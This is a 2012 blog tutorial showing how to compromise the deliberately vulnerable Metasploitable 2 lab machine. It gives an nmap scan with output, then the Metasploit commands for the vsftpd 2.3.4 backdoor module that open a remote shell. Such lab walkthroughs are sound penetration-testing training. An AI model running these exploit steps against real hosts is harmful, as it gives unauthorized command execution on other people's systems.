Wednesday, 17 October 2012

Metasploitable 2 has been PWNED with Metasploit

Posted by at 00:09 Read our previous post
Hi All, today I want to share about how to pwned Metasploitable v2.
You can download metasploitable v2 here
After installing Metasploitable 2 on Virtual machine, We will start to the step of pentest.

  1. Scan the running service on target machine
  2. Here, I'm using Nmap to do this job
    # nmap -sV -A
  3. I got this information about the services
    Starting Nmap 6.01 ( ) at 2012-10-17 17:18 EDT
    Nmap scan report for
    Host is up (0.00097s latency).
    Not shown: 977 closed ports
    21/tcp open ftp vsftpd 2.3.4
    22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp open telnet Linux telnetd
    25/tcp open smtp Postfix smtpd
    53/tcp open domain ISC BIND 9.4.2
    80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
    139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    512/tcp open exec netkit-rsh rexecd
    513/tcp open login?
    514/tcp open shell?
    1099/tcp open rmiregistry GNU Classpath grmiregistry
    1524/tcp open ingreslock?
    2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
    2121/tcp open ftp ProFTPD 1.3.1
    3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
    5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open vnc VNC (protocol 3.3)
    6000/tcp open X11 (access denied)
    6667/tcp open irc Unreal ircd
    8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
    8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  4. Ok, to many service. I will try VSFTPd 2.3.4
  5. Run your Metasploit, and search the exploit for VSFTPd 2.3.4
  6. Use the search command on Metasploit
    # msf> search vsftpd
  7. It will return
    exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution
  8. Use the exploit above,
    # msf> use exploit/unix/ftp/vsftpd_234_backdoor
  9. Setting the exploit,
    # msf  exploit(vsftpd_234_backdoor) > show options
  10. Set the RHOST with the IP Target
    # msf  exploit(vsftpd_234_backdoor) > set RHOST
  11. Show the available PAYLOAD,
    # msf  exploit(vsftpd_234_backdoor) > show payloads
  12. Select the Payload,
    # msf  exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
  13. Run the Exploit command,
    # msf  exploit(vsftpd_234_backdoor) > exploit
  14. Wait and you will bring into linux shell. Type uname -a and you will see the kernel of metasploitalbe 2.

Read my next post, Metasploitable 2 pwned with Metasploit - Part 2

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template